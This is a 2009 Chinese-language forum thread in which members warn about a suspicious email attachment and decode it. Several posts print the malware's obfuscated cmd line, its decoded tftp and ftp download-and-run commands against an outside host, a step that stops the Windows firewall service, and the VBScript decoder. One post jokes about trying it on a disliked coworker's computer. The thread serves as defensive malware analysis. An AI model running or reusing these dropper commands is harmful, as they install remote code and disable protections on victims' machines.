RSS   



  可打印版本 | 推薦給朋友 | 訂閱主題 | 收藏主題 | 純文字版  


 


 
主題: [其他] [分享]新型態的病毒傳播方式!   字型大小:||| 
uason
金驢友〔中級〕
等級: 17等級: 17等級: 17等級: 17等級: 17
思考中

 . 積分: 2748
 . 精華: 1
 . 文章: 1744
 . 收花: 25894 支
 . 送花: 4206 支
 . 比例: 0.16
 . 在線: 5301 小時
 . 瀏覽: 24230 頁
 . 註冊: 7993
 . 失蹤: 0
 . 快樂天堂
#1 : 2009-11-16 10:21 PM     只看本作者 引言回覆

剛收到的信件附加欓覺得很可疑!

他附加欓很小.
只有1K.
解壓縮後是一個類似捷徑的圖示.
執行指令如下.

%CoMsPEC% /C ecHo %M%%X%%M%P%A%%m%%x%%m%%X%%m%.NE%M%%a%gE%m%%A%%M%%a%F.Vbs>O.BAT&echo S%M%AR%M%%a%f.vBS>>o.BaT&SEt M=t&sEt x=f&SEt a= &O.bAT
也請各位網友多注意這種散播方式!



[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  發私人訊息  Blog  新增/修改 爬文標記
Observer
論壇第一龜毛
等級: 21等級: 21等級: 21等級: 21等級: 21等級: 21
藏雲

 . 積分: 4858
 . 精華: 5
 . 文章: 9343
 . 收花: 41831 支
 . 送花: 9842 支
 . 比例: 0.24
 . 在線: 8088 小時
 . 瀏覽: 111860 頁
 . 註冊: 7971
 . 失蹤: 1
 . 單身宿舍
#2 : 2009-11-16 10:43 PM     只看本作者 引言回覆

會怎麼樣呢?


[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  發私人訊息  Blog  新增/修改 爬文標記
45326565
銀驢友〔初級〕
等級: 12等級: 12等級: 12
Going down

今日心情

 . 積分: 511
 . 精華: 3
 . 文章: 1161
 . 收花: 4107 支
 . 送花: 10851 支
 . 比例: 2.64
 . 在線: 1161 小時
 . 瀏覽: 12841 頁
 . 註冊: 7088
 . 失蹤: 3314
 . TW
#3 : 2009-11-16 10:48 PM     只看本作者 引言回覆

*.bat,*.exe,*.html 之類的都最好不要點。

*.bat檔是用指令處理動作的,用左鍵點記事本編輯就能看裡面到底裝三小了

以前用GB雙開或是多重身分執行寫起來超好用,現在都偽裝成騙小孩的木馬跟綁架網頁導向。

記得把收到的信件來址加入黑單內唷



[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  發私人訊息  Blog  新增/修改 爬文標記
uason
金驢友〔中級〕
等級: 17等級: 17等級: 17等級: 17等級: 17
思考中

 . 積分: 2748
 . 精華: 1
 . 文章: 1744
 . 收花: 25894 支
 . 送花: 4206 支
 . 比例: 0.16
 . 在線: 5301 小時
 . 瀏覽: 24230 頁
 . 註冊: 7993
 . 失蹤: 0
 . 快樂天堂
#4 : 2009-11-16 11:27 PM     只看本作者 引言回覆

解出來就是這樣:

%CoMsPEC% /C ecHo tftP tftft.NEt gEt t F.Vbs>O.BAT
echo StARt f.vBS>>o.BaT
o.bat
o.bat 的內容就會是這樣:

tftP tftft.NEt gEt t F.Vbs
StARt f.vBS
抓下來的 F.VBs 內容:

sub k
for i=1 to UBound(s)
r=r&chr(s(i)-823)
next
Set kk = CreateObject("Wscript.Shell")
kk.run r,0
end sub
s=array(836,922 ... 中略 ... 942,870)
k
至於執行後有啥後果?
就要試試才知道了.

以上資料轉自 三秒練功房

[uason 在  2009-11-16 11:46 PM 作了最後編輯]



[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  發私人訊息  Blog  新增/修改 爬文標記
watchme
銀驢友〔高級〕
等級: 14等級: 14等級: 14等級: 14
無我

十週年紀念徽章(五級)  

今日心情

 . 積分: 926
 . 文章: 2172
 . 收花: 8002 支
 . 送花: 3799 支
 . 比例: 0.47
 . 在線: 3480 小時
 . 瀏覽: 31072 頁
 . 註冊: 7233
 . 失蹤: 14
 . TWed2k-DVD幫
#5 : 2009-11-17 10:02 AM     只看本作者 引言回覆

最後那個 VBs 是一次編碼的方式包裝惡意程式,主要目的就是為了躲避防毒防木馬軟體的偵測。陣列中的值各減去 823 之後組成一個新的 Script 給 W.Shell 執行 (0x0D 0x63  ),也許還有另外一層,也許沒有。總之,會這樣畏縮的程式,絕不是好東西。

cmd /c net stop sharedaccess&echo o tftft.net>n.txt&echo aa33>>n.txt&echo bb33>>n.txt&echo recv d d.exe>>n.txt&echo bye>>n.txt&ftp -s:n.txt&del n.txt&d.exe&attrib ?.vbs -r&del ? ?.exe ?.vbs ?.bat&start http://buy.yahoo.com.tw/



[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  發私人訊息  Blog  新增/修改 爬文標記
老江
版主
等級: 30等級: 30等級: 30等級: 30等級: 30等級: 30等級: 30等級: 30
School Days推廣

 . 積分: 391
 . 精華: 1
 . 文章: 3664
 . 收花: 1702 支
 . 送花: 8225 支
 . 比例: 4.83
 . 在線: 650 小時
 . 瀏覽: 18020 頁
 . 註冊: 7234
 . 失蹤: 251
#6 : 2009-11-17 09:33 PM     只看本作者 引言回覆

蠻有趣的,簡單的說他傳的不是程式
是讓你自己用自己的電腦寫一隻程式出來
vb可以這樣搞喔
我還在想沒有compiler傳這種有用嗎



[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  發私人訊息  Blog  新增/修改 爬文標記
qqchien
銀驢友〔高級〕
等級: 14等級: 14等級: 14等級: 14
謙謙

 . 積分: 808
 . 文章: 1455
 . 收花: 7196 支
 . 送花: 3339 支
 . 比例: 0.46
 . 在線: 722 小時
 . 瀏覽: 23492 頁
 . 註冊: 6653
 . 失蹤: 2826
#7 : 2009-11-18 04:52 PM     只看本作者 引言回覆

檔案名稱就告訴你會後悔了!
通常看到這種檔名 就不會去開了吧!

話說 '把收到的信件來址加入黑單內' 真的有用嗎?
通常不是都會換個帳號繼續寄



[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  發私人訊息  Blog  新增/修改 爬文標記
LiuRambo
金驢友〔初級〕
等級: 16等級: 16等級: 16等級: 16
我缺錢

十週年紀念徽章(二級)  

今日心情

 . 積分: 2086
 . 文章: 4914
 . 收花: 18693 支
 . 送花: 15318 支
 . 比例: 0.82
 . 在線: 2069 小時
 . 瀏覽: 13400 頁
 . 註冊: 7006
 . 失蹤: 418
#8 : 2009-11-21 08:16 AM     只看本作者 引言回覆


引用:
qqchien寫到:
檔案名稱就告訴你會後悔了!
通常看到這種檔名 就不會去開了吧!

話說 '把收到的信件來址加入黑單內' 真的有用嗎?
通常不是都會換個帳號繼續寄


對啊
現在的垃圾郵件問題在於你的帳號太容易被人家發覺到
一旦被加入到垃圾郵件俱樂部的寄送名單後
怎麼擋都擋不完的........
除非換帳號



[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  發私人訊息  Blog  新增/修改 爬文標記
htkstw
銀驢友〔初級〕
等級: 12等級: 12等級: 12


 . 積分: 356
 . 文章: 823
 . 收花: 2456 支
 . 送花: 4626 支
 . 比例: 1.88
 . 在線: 2123 小時
 . 瀏覽: 25311 頁
 . 註冊: 7990
 . 失蹤: 8
 . 台灣高雄市
#9 : 2009-11-21 09:16 AM     只看本作者 引言回覆

關於擋垃圾郵件, 我之前有想過用個人化簽名的方式來擋, 似乎是很有效.
所有寄給我的郵件, 只要它的個人化簽名沒有包含在我允許的特定字串中, 它就會被直接刪除.

只是要我的朋友們都使用這種個人化簽名, 似乎難度很高. 假如朋友們其中有人更改時, 又可能無法立即變更, 會造成收不到郵件. 最後就卡在這個問題無解而作罷.

唉~~還是沒辦法有效擋這些垃圾郵件.



[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  發私人訊息  Blog  新增/修改 爬文標記
bear242
銀驢友〔高級〕
等級: 14等級: 14等級: 14等級: 14
論壇第一純情種

今日心情

 . 積分: 1004
 . 精華: 2
 . 文章: 4433
 . 收花: 7760 支
 . 送花: 3663 支
 . 比例: 0.47
 . 在線: 1400 小時
 . 瀏覽: 17637 頁
 . 註冊: 7946
 . 失蹤: 2047
 . 無知的未來...
#10 : 2009-11-22 11:11 AM     只看本作者 引言回覆

找一個看不爽的同事的電腦借開一下就知道了.


[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  發私人訊息  Blog  新增/修改 爬文標記
Soup
銀驢友〔初級〕
等級: 12等級: 12等級: 12


 . 積分: 523
 . 文章: 2462
 . 收花: 4108 支
 . 送花: 1567 支
 . 比例: 0.38
 . 在線: 2035 小時
 . 瀏覽: 10620 頁
 . 註冊: 7994
 . 失蹤: 1034
 . 湯
#11 : 2009-11-27 06:26 PM     只看本作者 引言回覆

看了那圖示文字表示他有先警告過你開了會很後悔......


[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  發私人訊息  Blog  新增/修改 爬文標記
jimshow2001
鍛鐵驢友
等級: 7等級: 7等級: 7


今日心情

 . 積分: 85
 . 文章: 333
 . 收花: 636 支
 . 送花: 247 支
 . 比例: 0.39
 . 在線: 900 小時
 . 瀏覽: 8840 頁
 . 註冊: 6087
 . 失蹤: 5
#12 : 2009-11-28 01:49 AM     只看本作者 引言回覆

現在是看到40k內的檔案都會詢問- -
最近朋友的信箱好像中了奇怪的東西
每次用網頁開啟信箱的時候都會自動下載一的文件XD

..感覺超可怕的--



[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  發私人訊息  Blog  新增/修改 爬文標記
sdbb
銅驢友〔高級〕
等級: 10等級: 10等級: 10


 . 積分: 168
 . 文章: 415
 . 收花: 1367 支
 . 送花: 3719 支
 . 比例: 2.72
 . 在線: 1584 小時
 . 瀏覽: 15241 頁
 . 註冊: 6648
 . 失蹤: 624
 . 地球
#13 : 2009-11-28 12:17 PM     只看本作者 引言回覆


引用:
老江寫到:
蠻有趣的,簡單的說他傳的不是程式
是讓你自己用自己的電腦寫一隻程式出來
vb可以這樣搞喔
我還在想沒有compiler傳這種有用嗎


vbscript是腳本語言不是vb,只要是win98se以後,就可以直接執行
http://zh.wikipedia.org/wiki/VBScript



[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  發私人訊息  Blog  新增/修改 爬文標記

   



 



所在時區為 GMT+8, 現在時間是 2024-4-18 02:55 PM
清除 Cookies - 連絡我們 - TWed2k © 2001-2046 - 純文字版 - 說明
Discuz! 0.1 | Processed in 0.029535 second(s), 7 queries , Qzip disabled